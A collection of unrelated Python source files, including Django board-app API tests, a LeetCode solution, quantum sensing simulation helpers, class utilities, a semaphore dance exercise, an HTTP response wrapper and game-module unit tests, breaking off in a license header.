def test_get_all_attachment(self):
"""
Tests that all attachments can be fetched on the attachment list route ("board:attachments") -- LIST (GET)
"""
# import pdb; pdb.set_trace()
response = self.client.get(reverse("board:attachments"))
self.assertTrue(response.json()["success"])
self.assertEqual(response.status_code, 200)
# import pdb
# pdb.set_trace()
# response_attachments = response.json()["attachments"]
# for attachment in response_attachments:
# db_attachment = Attachment.objects.first()
# for key, value in attachment.items():
# self.assertEqual(value, getattr(db_attachment, key))
def test_create_attachment(self):
image = open(
r"/Users/peedor/Desktop/git/pee/urgent/tw-ko/backend/board/tests/resources/FJ9zqiRWQAImHie.jpeg", "rb")
file = SimpleUploadedFile(
image.name, image.read(), content_type='multipart/form-data')
data = {
"file": file,
"type": "image"
}
response = self.client.post(
reverse("board:attachments"), data=data, format='multipart')
self.assertEqual(response.status_code,
201)
# import pdb
# pdb.set_trace()
self.assertTrue(response.json()["success"])
db_attachment = Attachment.objects.get(
file=data["file"], type=data["type"])
self.assertEqual(data["type"], db_attachment.type)
self.assertEqual(data["file"], db_attachment.file)
response_attachment = response.json()
self.assertEqual(data.get("type"), response_attachment.get("type"))
self.assertEqual(data.get("file"), response_attachment.get("file"))
def test_get_a_single_attachment(self):
"""
Tests that a single attachment can be fetched on the attachment detail route ("board:attachment-detail")
"""
# Create a board [Done]
# hit the endpoint with the board's pk on /api/boards/<int:pk>/
# Assert the content
response = self.client.get(
reverse("board:attachment-detail", args=(self.attachment.pk,)))
self.assertEqual(response.status_code, 200)
for field, value in self.attachment_data.items():
self.assertEqual(value, getattr(self.attachment, field))
def test_delete_a_single_attachment(self):
"""
Test that a single attachment can be deleted on the attachment detail route ("board:attachment-detail")
"""
response = self.client.delete(
reverse("board:attachment-detail", args=(self.attachment.pk,)))
self.assertEqual(response.status_code, 204)
with self.assertRaises(Attachment.DoesNotExist):
# Raise does not exist
Attachment.objects.get(file=self.attachment_data["file"])
class ListViewTest(APITestCase):
def setUp(self):
self.client = APIClient()
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
self.list_data = {
"id": 3,
"title": "Black board",
"created_at": "2021-12-22T12:42:50.191263Z",
"board": self.board
}
# create(name="", description="")
self.list = List.objects.create(**self.list_data)
def test_get_all_lists(self):
"""
Tests that all lists can be fetched on the list route ("board:list") -- LIST (GET)
"""
response = self.client.get(reverse("board:list"))
self.assertTrue(response.json()["success"])
self.assertEqual(response.status_code, 200)
# response_lists = response.json()["lists"]
# for list in response_lists:
# db_list = List.objects.get(title=list["title"])
# for key, value in list.items():
# if key == "date":
# self.assertEqual(value, getattr(
# db_list, key).strftime(self.DATETIME_FORMAT))
# continue
# self.assertEqual(value, getattr(db_list, key))
def test_create_list(self):
"""
Tests list creation on the list route ("board:lists") -- POST
"""
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
data = {
"title": "List title",
"board": self.board.pk
}
response = self.client.post(reverse("board:lists"), data=data)
self.assertEqual(response.status_code, 201)
self.assertTrue(response.json()["success"])
db_lists = List.objects.get(title=data["title"])
self.assertEqual(data["title"], db_lists.title)
self.assertEqual(data["board"], db_lists.board.pk)
response_list = response.json()["lists"]
self.assertEqual(data["title"], response_list["title"])
self.assertEqual(data["board"], response_list["board"])
def test_get_a_single_list(self):
"""
Tests that a single list can be fetched on the list detail route ("board:list-detail")
"""
# Create a board [Done]
# hit the endpoint with the board's pk on /api/boards/<int:pk>/
# Assert the content
response = self.client.get(
reverse("board:list-detail", args=(self.list.pk,)))
self.assertEqual(response.status_code, 200)
# for field, value in self.list_data.items():
# self.assertEqual(value, getattr(self.list, field))
def test_update_a_single_list(self):
"""
Test that a single list can be updated on the list detail route ("board:list-detail")
"""
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
update_data = {
"title": "An edited list",
"board": self.board.pk
}
response = self.client.put(
reverse("board:list-detail", args=(self.list.pk,)), data=update_data)
self.assertEqual(response.status_code, 200)
self.list.refresh_from_db()
self.assertEqual(update_data['title'], self.list.title)
def test_delete_a_single_list(self):
"""
Test that a single list can be deleted on the list detail route ("board:list-detail")
"""
response = self.client.delete(
reverse("board:list-detail", args=(self.list.pk,)))
self.assertEqual(response.status_code, 204)
with self.assertRaises(List.DoesNotExist):
# Raise does not exist
List.objects.get(title=self.list_data["title"])
|
class Solution:
def firstUniqChar(self, s: str) -> int:
uniq = {}
for ch in s:
if ch in uniq:
uniq[ch] = False
else:
uniq[ch] = True
for i, ch in enumerate(s):
if uniq[ch]:
return i
return -1
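# Quick illustrative checks (the standard LeetCode examples for this problem):
if __name__ == "__main__":
    assert Solution().firstUniqChar("leetcode") == 0
    assert Solution().firstUniqChar("loveleetcode") == 2
    assert Solution().firstUniqChar("aabb") == -1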
|
import numpy as np
from scipy.signal import hilbert
from numpy.linalg import eigh, inv
from operators import *
import scipy.sparse as ssp
import matplotlib as mpl
import scipy.linalg as sla
import scipy.signal
from time import gmtime
import json
import matplotlib.pyplot as plt
mpl.rcParams['figure.figsize'] = 16, 9
# TODO: Epsilon reconstruction search (100 values)
# Error metric for reconstructions (RMSE?)
def dict_write(path, rdict):
"""
Writes a dictionary to a text file at location <path>
"""
date = gmtime()
name = "{}_{}_{}_{}_{}_{}".format(date.tm_year,date.tm_mon, date.tm_mday, date.tm_hour, date.tm_min, date.tm_sec)
# convert every value to a string so the dict is JSON-serialisable
for key in rdict:
rdict[key] = str(rdict[key])
# write to file
with open(path+name+".json", 'a') as file:
json.dump(rdict, file)
return name
# define rectangular function centered at 0 with width equal to period
def rect(period, time):
return np.where(np.abs(time) <= period/2, 1, 0)
# hyperbolic secant
def sech(x):
return 1/np.cosh(x)
def remap(state):
"""
converts a quantum state to bloch vector
"""
mstate = np.matrix(state)
rho = np.outer(mstate.H, mstate)
u = 2*np.real(rho[0, 1])
v = 2*np.imag(rho[1, 0])
w = np.real(rho[0, 0] - rho[1, 1])
return [u, v, w]
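# Quick illustrative check: the basis state [1, 0] maps to the north pole of the
# Bloch sphere, i.e. the vector [0, 0, 1].
assert remap([1, 0]) == [0, 0, 1]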
def conjt(A):
"""
returns conjugate transpose of A
"""
return np.conj(np.transpose(A))
def normalisedQ(state):
"""
Checks if an input state is correctly normalised
"""
# check if vector or operator
if np.shape(state)[0] == np.shape(state)[1]:
return np.isclose(np.trace(state), 1.0)
else:
# compute sum of probability distribution
psum = 0.0
for i in state:
psum += np.abs(i)**2
return np.isclose(psum, 1.0)
def unitary_concat(cache, index):
unitary = cache[0]
for u in cache[1:index]:
unitary = u @ unitary
return unitary
def dict_sanitise(params):
"""
Sanitise a simulation parameter dictionary so later (C-side) dict retrievals never hit a missing key
"""
# set parameter dictionary to defaults if not specified
cparams = {"tstart": 0.0,
"tend": 1e-4,
"dt": 1e-5,
"savef": 1,
"larmor": gyro,
"phi": 0,
"rabi": 0,
"rff": 0,
"rph": 0,
"proj": meas1["0"],
"quad": 0,
"dett": 1e4,
"detA": 0,
"dete": 1,
"xlamp": 0.0,
"xlfreq": 50,
"xlphase": 0.0,
"tr2": 0.0,
"zlamp": 0.0,
"zlfreq": 50,
"zlphase": 0.0,
"beta": 10,
"nt": 1e4,
"nf": 1,
"sA": 0.0,
"cdtrabi": 0.0,
"sdtrabi": 0.0,
"ctcrabi": 1.0,
"stcrabi": 0.0,
"cdtxl": 0.0,
"sdtxl": 0.0,
"ctcxl": 1.0,
"stcxl": 0.0,
}
# overwrite defaults
for p in cparams.keys():
# default value to zero (kills all not specified components)
if p not in params.keys():
cparams[p] = 0.0
else:
cparams[p] = params[p]
# set end spike default so a single spike occurs
if 'nte' not in cparams.keys():
cparams["nte"] = cparams["nt"] + 1/cparams["nf"]
return cparams
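# Quick illustrative check (example parameter values): unspecified parameters
# collapse to zero and "nte" defaults to nt + 1/nf (a single spike).
_example_params = dict_sanitise({"nt": 1e4, "nf": 2.0})
assert _example_params["rabi"] == 0.0
assert _example_params["nte"] == 1e4 + 0.5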
def state2pnt(cache):
"""
maps a state cache to a set of bloch vector points suitable for plotting
"""
x, y, z = [], [], []
pnts = []
for i in cache[::2]:
pnts.append(remap(np.matrix(i)))
for vec in pnts:
x.append(vec[0])
y.append(vec[1])
z.append(vec[2])
return [x, y, z]
def frame_analyser(state_cache, frame=["interaction", "lab"], time=None, larmor=gyro, omega=1e4, detuning=1e-9, project=meas1["0"]):
"""
Re-expresses a lab-frame state evolution in another reference frame
(interaction, dressed, or a user-supplied unitary) and plots the resulting
projection probabilities.
"""
# determine dimensionality of quantum system
dim = np.shape(state_cache[0])[0]
# time step size
dt = time[1] - time[0]
# compute reference frame map (bit crude but sufficient for its temporary use)
if callable(frame):
assert time is not None, "No time vector supplied for callable unitary transform"
unitary_map = frame
elif frame == "interaction":
def unitary_map(t, larmor=larmor):
return np.asarray([[np.exp(1j*np.pi*larmor*t), 0], [0, np.exp(-1j*np.pi*larmor*t)]])
elif frame == "dressed":
# define dressed state transform: a rotation by half the mixing angle arctan(omega/detuning)
def dressed(t, omega=omega, detuning=detuning):
    theta = np.arctan(omega / detuning) / 2
    return np.asarray([[np.cos(theta), -np.sin(theta)],
                       [np.sin(theta), np.cos(theta)]])
def unitary_map(t, larmor=larmor):
    return dressed(t) @ np.asarray([[np.exp(1j * np.pi * larmor * t), 0],
                                    [0, np.exp(-1j * np.pi * larmor * t)]])
else:
raise ValueError("Unrecognised reference frame")
# apply transform to states
if callable(unitary_map):
new_states = [unitary_map(t) @ state_cache[:, :, step] for step, t in enumerate(time)]
# for step,t in enumerate(time):
# print(unitary_map(step) @ np.asarray([[1],[1]])/np.sqrt(2))
else:
new_states = [unitary_map @ state for state in state_cache]
# compute projectors
nprobs = np.squeeze([np.abs(project @ nstate)**2 for i, nstate in enumerate(new_states)])
if time is not None:
# plot new probabilities
plt.plot(time, nprobs)
plt.ylim([0, 1])
plt.grid()
plt.show()
return state2pnt(new_states)
def stability_measure(time, omega, detune):
"""
Generates a plot of the derivative of the precession angle of a state
in the presence of a detuning field and compares it against the Rabi vector
as a function of time
"""
pass
def demodulate(time, signal, cfreq, fs):
"""
Performs simple demodulation of an input signal given carrier
frequency <cfreq> and sample rate <fs>.
"""
carrier_cos = np.cos(2*np.pi*cfreq*time)
carrier_sin = np.sin(2*np.pi*cfreq*time)
csignal = carrier_cos*signal
ssignal = carrier_sin*signal
    # simple Butterworth low-pass; Wn is normalised to the Nyquist frequency fs/2, so the cutoff sits at cfreq
Wn = 2*cfreq/fs
b,a = scipy.signal.butter(3, Wn)
filt_cos = scipy.signal.lfilter(b,a, csignal)
filt_sin = scipy.signal.lfilter(b,a, ssignal)
plt.plot(time, filt_cos, label='Filtered Cosine')
plt.plot(time, filt_sin, label='Filtered Sine')
plt.grid(True)
plt.legend()
plt.show()
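# Example usage of demodulate (an illustrative sketch): recover a slow 2 Hz
# envelope riding on a 50 Hz carrier sampled at 10 kHz.
#
#     fs = 1e4
#     t = np.arange(0, 1, 1/fs)
#     sig = (1 + 0.5*np.sin(2*np.pi*2*t)) * np.cos(2*np.pi*50*t)
#     demodulate(t, sig, cfreq=50, fs=fs)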
def pulse_gen(freq=100, tau=[1.0], amp=1, nte=[None]):
"""
Generates a multipulse signal with a pretty neat dynamic approach
"""
# define a box function
def box(t, start, end):
if not isinstance(t, np.ndarray):
t = np.asarray(t)
return (t > start) & (t < end)
# define sum function
def sig_sum(t, terms):
return sum(f(t) for f in terms)
# list to hold spike functions
terms = []
for time,end in zip(tau,nte):
if end is None:
# generate spike functions, avoiding variable reference issue
terms.append(lambda t, tau=time: box(t, tau, tau+1/freq)
* amp*np.sin(2*np.pi*freq*(t-tau)))
        else:
            # generate spike functions, binding both tau and end as default
            # arguments to avoid the late-binding closure issue
            terms.append(lambda t, tau=time, end=end: box(t, tau, end)
                         * amp*np.sin(2*np.pi*freq*(t-tau)))
# generate final signal function
signal = lambda t, funcs=terms: sig_sum(t, funcs)
return signal
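# Example usage of pulse_gen (an illustrative sketch): two 100 Hz spikes, one
# starting at t = 0.1 s and lasting a single carrier period (nte=None), and one
# starting at t = 0.3 s that is explicitly cut off at t = 0.35 s.
#
#     sig = pulse_gen(freq=100, tau=[0.1, 0.3], amp=1, nte=[None, 0.35])
#     t = np.linspace(0, 0.5, 5000)
#     plt.plot(t, sig(t))
#     plt.show()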
def input_output(f_range=[200, 400, 2], sig_range=[300, 400, 2], t=[0, 1/10, 1/1e3]):
"""
Computes a set of input/output transformation pairs as part of the map determination problem
"""
# number of signal samples to generate
K = len(np.arange(sig_range[0], sig_range[1], sig_range[2]))
# number of measurements to make
M = len(np.arange(f_range[0], f_range[1], f_range[2]))
# length of signal vector
N = len(np.linspace(t[2], t[1], int((t[1] - t[0])/t[2])))
# sensor array
sensor = np.zeros((M, K), dtype=float)
# source array
source = np.zeros((N, K), dtype=float)
# ensure reconstruction is possible
assert M <= K, "Need more signal data to reconstruct data array"
assert N == M, "Current investigation method requires same dimensionality"
# iterate over signal freqs
for k, sig_freq in enumerate(np.arange(sig_range[0], sig_range[1], sig_range[2])):
print("Computing sensor output for test signal {}/{}".format(k, K), end='\r')
# perform map operation
freqs, projs, signal = pseudo_fourier(
sig_amp=5, sig_freq=sig_freq, f_range=f_range, plot=False)
# store output projections and source signal
sensor[:, k] = projs
source[:, k] = signal
return source, sensor
def plot_gen_1(freqs, projs, time, sim_vars):
"""
Generates publication ready plots using compressive atomic sensing
"""
signal = pulse_gen(sim_vars["sig_freq"], tau=[sim_vars["tau"]], amp=sim_vars["sig_amp"], nte=[sim_vars["nte"]])
plt.style.use('dark_background')
plt.subplot(2, 1, 1)
plt.plot(time, signal(time), 'g-')
# plt.grid(True)
plt.title("Magnetic field signal", fontsize=18)
plt.ylim([-1, 1])
plt.ylabel("Amplitude (G)", fontsize=14)
plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 3))
plt.xlabel("Time (s)", fontsize=14)
plt.subplot(2, 1, 2)
#plt.stem(freqs, projs, linewidth=0.6, bottom=np.mean(projs))
plt.plot(freqs, projs, 'o-', linewidth=0.6, alpha=0.3,)
plt.ylabel("$|\langle 1 | \psi(t) \\rangle |^2 $", fontsize=16)
plt.xlabel("Tuning frequency (Hz)", fontsize=14)
plt.savefig("original.png", dpi=1500)
# plt.grid(True)
plt.show()
def signal_generate(time, sim_vars):
"""
Generates the neural signal defined by sim_vars
"""
# assume single pulse if not defined
if "nte" not in sim_vars.keys():
nte = sim_vars["tau"] + 1/sim_vars["sig_freq"]
sim_vars["nte"] = nte
signal = pulse_gen(sim_vars["sig_freq"], tau=[sim_vars["tau"]], amp=sim_vars["sig_amp"], nte=[sim_vars["nte"]])
signal = signal(time)
signal /= np.max(np.abs(signal))
return signal
def rmse(v1,v2):
"""
Computes RMSE between two input vectors
"""
return np.sqrt(np.mean((v1-v2)**2))
def plot_gen_2(freqs, projs, comp_f, comp_p, time, recon, sim_vars, savefig=False):
"""
Generates publication ready plots using compressive atomic sensing
"""
# generate original signal
signal = pulse_gen(sim_vars["sig_freq"], tau=[sim_vars["tau"]], amp=sim_vars["sig_amp"], nte=[sim_vars["nte"]])
signal = signal(time)
signal /= np.max(np.abs(signal))
recon /= np.max(np.abs(recon))
# format projections to expectation value
projs = 2*projs - 1
comp_p = 2*comp_p - 1
# get number of measuremens used
measurements = sim_vars["measurements"]
#plt.style.use('dark_background')
plt.subplot(2, 1, 1)
plt.plot(time, signal, 'g-')
plt.plot(time, recon, 'r-')
plt.legend(["Original","Reconstruction"])
plt.title("Magnetic field signal reconstruction with {} Fourier measurements using \"{}\" method".format(
measurements, sim_vars["method"]), fontsize=18)
plt.ylabel(r"Amplitude", fontsize=14)
plt.ticklabel_format(style='sci', axis='y', scilimits=(0, 3))
plt.xlabel("Time (s)", fontsize=14)
plt.subplot(2, 1, 2)
plt.plot(freqs, projs, 'o-', alpha=0.3, linewidth=0.6, label="_nolegend_")
plt.plot(comp_f, comp_p, 'r*', linewidth=1.5, label="Sample frequencies")
plt.legend()
plt.ylabel(r"$\langle F_z \rangle $", fontsize=16)
plt.xlabel("Tuning frequency (Hz)", fontsize=14)
plt.figure(num=1, figsize=[12,9])
if savefig:
path = "C:\\Users\\Joshua\\Research\\Uni\\2018\\Project\\Latex\\Proj_Figures\\"
# save parameters to text file
fig_name = dict_write(path, sim_vars)
plt.savefig(path+fig_name+".png", transparent=True, dpi=1000)
plt.show()
|
import builtins
import copy
import types
from collections import defaultdict, deque
from typing import TypeVar, Any, Optional, Callable, Type, Dict, Iterable
__all__ = ['common_ancestor', 'create_class', 'resolve_bases', 'static_vars', 'static_copy']
T = TypeVar('T')
def create_class(name: str,
bases: Iterable = (),
attrs: dict = {},
metaclass: Optional[Callable[..., Type[T]]] = None,
**kwargs: Any
) -> Type[T]:
"""
Creates a new class. This is similar to :func:`types.new_class`,
except it calls :func:`resolve_bases` even in python versions
<= 3.7. (And it has a different interface.)
:param name: The name of the new class
:param bases: An iterable of bases classes
:param attrs: A dict of class attributes
:param metaclass: The metaclass, or ``None``
:param kwargs: Keyword arguments to pass to the metaclass
"""
if metaclass is not None:
kwargs.setdefault('metaclass', metaclass)
resolved_bases = resolve_bases(bases)
meta, ns, kwds = types.prepare_class(name, resolved_bases, kwargs)
ns.update(attrs)
# Note: In types.new_class this is "is not" rather than "!="
if resolved_bases != bases:
ns['__orig_bases__'] = bases
return meta(name, resolved_bases, ns, **kwds)
def resolve_bases(bases: Iterable) -> tuple:
"""
Clone/backport of :func:`types.resolve_bases`.
"""
result = []
for base in bases:
if isinstance(base, type):
result.append(base)
continue
try:
mro_entries = base.__mro_entries__
except AttributeError:
result.append(base)
continue
new_bases = mro_entries(bases)
result.extend(new_bases)
return tuple(result)
def static_vars(obj: Any):
"""
Like :func:`vars`, but bypasses overridden ``__getattribute__`` methods.
:param obj: Any object
:return: The object's ``__dict__``
:raises TypeError: If the object has no ``__dict__``
"""
try:
return object.__getattribute__(obj, '__dict__')
except AttributeError:
raise TypeError("{!r} object has no __dict__".format(obj)) from None
def static_copy(obj: Any):
"""
Creates a copy of the given object without invoking any of its methods -
``__new__``, ``__init__``, ``__copy__`` or anything else.
How it works:
1. A new instance of the same class is created by calling
``object.__new__(type(obj))``.
2. If ``obj`` has a ``__dict__``, the new instance's
``__dict__`` is updated with its contents.
3. All values stored in ``__slots__`` (except for ``__dict__``
and ``__weakref__``) are assigned to the new object.
An exception are instances of builtin classes - these are copied
by calling :func:`copy.copy`.
    .. versionadded:: 1.1
"""
from .classes import iter_slots
cls = type(obj)
# We'll check the __module__ attribute for speed and then also
# make sure the class isn't lying about its module
if cls.__module__ == 'builtins' and cls in vars(builtins).values():
return copy.copy(obj)
new_obj = object.__new__(cls)
try:
old_dict = static_vars(obj)
except TypeError:
pass
else:
static_vars(new_obj).update(old_dict)
for slot_name, slot in iter_slots(cls):
if slot_name in {'__dict__', '__weakref__'}:
continue
try:
value = slot.__get__(obj, cls)
except AttributeError:
pass
else:
slot.__set__(new_obj, value)
return new_obj
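# Illustrative sketch of static_copy (the class below is hypothetical and not
# part of this module):
#
#     class Loud:
#         def __init__(self):
#             print("init runs")
#             self.x = 1
#
#     original = Loud()                # prints "init runs"
#     clone = static_copy(original)    # silent: __init__ is never invoked
#     assert static_vars(clone) == {'x': 1}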
def common_ancestor(classes: Iterable[type]):
"""
Finds the closest common parent class of the given classes.
If called with an empty iterable, :class:`object` is returned.
:param classes: An iterable of classes
:return: The given classes' shared parent class
"""
# How this works:
# We loop through all classes' MROs, popping off the left-
# most class from each. We keep track of how many MROs
# that class appeared in. If it appeared in all MROs,
# we return it.
mros = [deque(cls.__mro__) for cls in classes]
num_classes = len(mros)
share_count = defaultdict(int)
while mros:
# loop through the MROs
for mro in mros:
# pop off the leftmost class
cls = mro.popleft()
share_count[cls] += 1
# if it appeared in every MRO, return it
if share_count[cls] == num_classes:
return cls
# remove empty MROs
mros = [mro for mro in mros if mro]
return object
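# Illustrative sketch of common_ancestor (doctest-style, following the MRO walk
# described above):
#
#     >>> common_ancestor([bool, int])
#     <class 'int'>
#     >>> common_ancestor([bool, float])
#     <class 'object'>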
|
import sys
import time
import random
from sync_utils import Thread, Semaphore, watch
NUM_LEADERS = 0
NUM_FOLLOWERS = 0
LEADERS_QUEUE = Semaphore(0)
FOLLOWERS_QUEUE = Semaphore(0)
MUTEX = Semaphore(1)
RENDEZVOUS = Semaphore(0)
def print_queue():
global NUM_LEADERS
global NUM_FOLLOWERS
sys.stdout.write("\tL: {} F: {}\n".format(NUM_LEADERS, NUM_FOLLOWERS))
def leader():
global NUM_LEADERS
global NUM_FOLLOWERS
MUTEX.acquire()
sys.stdout.write("Leader arrived.")
if NUM_FOLLOWERS:
NUM_FOLLOWERS -= 1
sys.stdout.write(" Pair passes.")
print_queue()
FOLLOWERS_QUEUE.signal()
else:
NUM_LEADERS += 1
sys.stdout.write(" Waiting.")
print_queue()
MUTEX.release()
LEADERS_QUEUE.wait()
sys.stdout.write("Leader dances.\n")
RENDEZVOUS.wait()
MUTEX.release()
def follower():
global NUM_LEADERS
global NUM_FOLLOWERS
MUTEX.acquire()
sys.stdout.write("Follower arrived.")
if NUM_LEADERS:
NUM_LEADERS -= 1
sys.stdout.write(" Pair passes.")
print_queue()
LEADERS_QUEUE.signal()
else:
NUM_FOLLOWERS += 1
sys.stdout.write(" Waiting.")
print_queue()
MUTEX.release()
FOLLOWERS_QUEUE.wait()
sys.stdout.write("Follower dances.\n")
RENDEZVOUS.signal()
def main():
while True:
time.sleep(0.25)
person = leader if random.randint(0, 1) else follower
Thread(person)
watch(main)
|
#._cv_part guppy.etc.Code
def co_code_findloadednames(co):
"""Find in the code of a code object, all loaded names.
(by LOAD_NAME, LOAD_GLOBAL or LOAD_FAST) """
from opcode import HAVE_ARGUMENT, opmap
hasloadname = (opmap['LOAD_NAME'],opmap['LOAD_GLOBAL'],opmap['LOAD_FAST'])
code = co.co_code
nargs = co.co_argcount
len_co_names = len(co.co_names)
indexset = {}
n = len(code)
i = 0
while i < n:
c = code[i]
op = ord(c)
i = i+1
if op >= HAVE_ARGUMENT:
if op in hasloadname:
oparg = ord(code[i]) + ord(code[i+1])*256
name = co.co_names[oparg]
indexset[name] = 1
if len(indexset) >= len_co_names:
break
i = i+2
for name in co.co_varnames:
try:
del indexset[name]
except KeyError:
pass
return indexset
def co_findloadednames(co):
"""Find all loaded names in a code object and all its consts of code type"""
names = {}
names.update(co_code_findloadednames(co))
for c in co.co_consts:
if isinstance(c, type(co)):
names.update(co_findloadednames(c))
return names
|
# -*- coding: utf-8 -*-
from requests import Response, Session
class SafeResponse(object):
def __init__(self, success, response=None, session=None):
self.__success: bool = success
self.__response: Response = response
self.__session: Session = session
def __repr__(self):
if self.success:
status = "Success: %s" % self.response.status_code
else:
status = "Failed"
return '<SafeResponse [%s]>' % status
@property
def success(self):
return self.__success
@property
def response(self):
if self.success:
return self.__response
else:
return None
@property
def status_code(self):
if self.success:
return self.__response.status_code
else:
return None
@property
def session(self):
if self.success:
return self.__session
else:
return None
class StatusFilter(set):
def interpret_options(self):
""" Interpret option set
1. Parse :class `range`
2. Make positive list
           range(100, 600) if len(positive) == 0
:return: positive-set, negative-set
"""
positive = set()
negative = set()
for item in self:
# Case <range item>
if type(item) == range:
if item.start + item.stop > 0:
positive |= set(item)
else:
negative |= set(item)
# Case <int item>
elif type(item) == int:
if item >= 100:
positive.add(item)
elif item <= -100:
negative.add(item)
else:
raise ValueError("Interpret Failed")
return positive, negative
def pass_list(self):
r""" Make include list from options
:return: list `include list`
:rtype: list
"""
positive: set
negative: set
positive, negative = self.interpret_options()
# If positive set is empty, make all-pass-set of status code
if len(positive) == 0:
positive = set(range(100, 600))
# Exclude negative items
        for item in negative:
            positive.discard(-item)
return list(positive)
def check(self, status_code):
r""" Test :param `status_code` is pass
:param status_code:
:return: success or fail
:rtype: bool
"""
if status_code in self.pass_list():
return True
else:
return False
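# Illustrative usage of StatusFilter (a sketch): accept any status code except 404.
#
#     ok_filter = StatusFilter({-404})
#     ok_filter.check(200)   # True  (empty positive set means all of 100-599 pass)
#     ok_filter.check(404)   # False (negated codes are excluded)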
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import unittest
from tcoc import hero
class TestDice(unittest.TestCase):
def test_simple_dice_roll(self):
# Simple, every result should be a number in the range [1, 6]
rolls = [hero.Hero.dice_roll(1) for _ in range(10000)]
self.assertTrue(all(0 < x <= 6 for x in rolls),
"Not all rolls of a single dice return a number "
"in the range [1, 6]")
def test_double_dice_roll(self):
        # As anyone who has played The Settlers of Catan knows, the most
        # common result of a 2-dice roll is 7.
# (Note): RNG being RNG, this test has failed randomly twice
rolls_counter = collections.Counter(
hero.Hero.dice_roll(2) for _ in range(10000))
most_common = max(rolls_counter, key=lambda x: rolls_counter[x])
self.assertEqual(most_common,
7,
"7 is not the most common result for 2-dice rolls")
class TestHero(unittest.TestCase):
def setUp(self):
self.test_hero = hero.Hero()
self.test_hero.magic_random_init()
def test_random_heros(self):
heroes = [hero.Hero() for _ in range(1000)]
self.assertTrue(all(7 <= h.skill <= 12 for h in heroes),
"Not all heroes have normal skills")
self.assertTrue(all(14 <= h.stamina <= 24 for h in heroes),
"Not all heroes have normal stamina")
self.assertTrue(all(7 <= h.luck <= 12 for h in heroes),
"Not all heroes have normal luck")
def test_hero_skill(self):
_init_value = self.test_hero.skill
self.test_hero.skill += 100
self.assertTrue(7 <= self.test_hero.skill <= 12,
"hero skill increased beyond initial value")
self.test_hero.skill -= 100
self.assertEqual(self.test_hero.skill, 0,
"hero skill decreased beyond zero")
self.test_hero.skill = _init_value
def test_hero_stamina(self):
_init_value = self.test_hero.stamina
self.test_hero.stamina += 100
self.assertTrue(14 <= self.test_hero.stamina <= 24,
"hero stamina increased beyond initial value")
self.test_hero.stamina -= 100
self.assertEqual(self.test_hero.stamina, 0,
"hero skill decreased beyond zero")
self.test_hero.stamina = _init_value
def test_hero_luck(self):
_init_value = self.test_hero.luck
self.test_hero.luck += 100
self.assertTrue(7 <= self.test_hero.luck <= 12,
"hero luck increased beyond initial value")
self.test_hero.luck -= 100
self.assertEqual(self.test_hero.luck, 0,
"hero luck decreased beyond zero")
self.test_hero.luck = _init_value
def test_hero_stamina_percentage(self):
self.test_hero.stamina -= 1
self.assertTrue(0 < self.test_hero.stamina_percentage < 1,
"hero stamina percentage is not a normal "
"ratio: %s" % self.test_hero.stamina_percentage)
def test_random_magic(self):
spells = sum(self.test_hero.equipped_spells[x] for x in
self.test_hero.equipped_spells)
self.assertEqual(spells, self.test_hero.magic,
"hero didn't equip the correct amount of spells")
def test_random_magic_cast(self):
start = sum(self.test_hero.equipped_spells[x] for x in
self.test_hero.equipped_spells)
first_spell = next(iter(self.test_hero.equipped_spells))
self.test_hero.magic_cast(first_spell)
end = sum(self.test_hero.equipped_spells[x] for x in
self.test_hero.equipped_spells)
self.assertEqual(
start - end,
1,
"cast fail {} {}".format(
self.test_hero, self.test_hero.equipped_spells))
def test_quickcombat_win(self):
_monster = hero.Monster(0, 1)
win, winner = self.test_hero.quick_combat(_monster)
self.assertTrue(win, "Lost unlosable quick combat")
self.assertEqual(winner, self.test_hero, "Wrong winner returned")
class TestMonster(unittest.TestCase):
def setUp(self):
self.test_monster = hero.Monster(10, 10)
def test_monster_stamina_percentage(self):
self.test_monster.stamina -= 3
self.assertEqual(self.test_monster.stamina_percentage, 0.7)
def test_monster_winpercentage(self):
win, survival, flawless = self.test_monster.winpercentage(10000)
self.assertTrue(0 <= win <= 1,
"Wrong value for wins: {}".format(win))
self.assertTrue(0 <= survival <= 1,
"Wrong value for survival: {}".format(survival))
self.assertTrue(0 <= flawless <= 1,
"Wrong value for survival: {}".format(flawless))
def test_monster_winpercentage_specific_hero(self):
test_hero = hero.Hero()
win, survival, flawless = self.test_monster.winpercentage(
10000, hero=test_hero)
self.assertTrue(0 <= win <= 1,
"Wrong value for wins: {}".format(win))
self.assertTrue(0 <= survival <= 1,
"Wrong value for survival: {}".format(survival))
self.assertTrue(0 <= flawless <= 1,
"Wrong value for survival: {}".format(flawless))
|
"""Unit tests for :mod:`prov_interop.provtranslator.converter`.
"""
# Copyright (c) 2015 University of Southampton
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
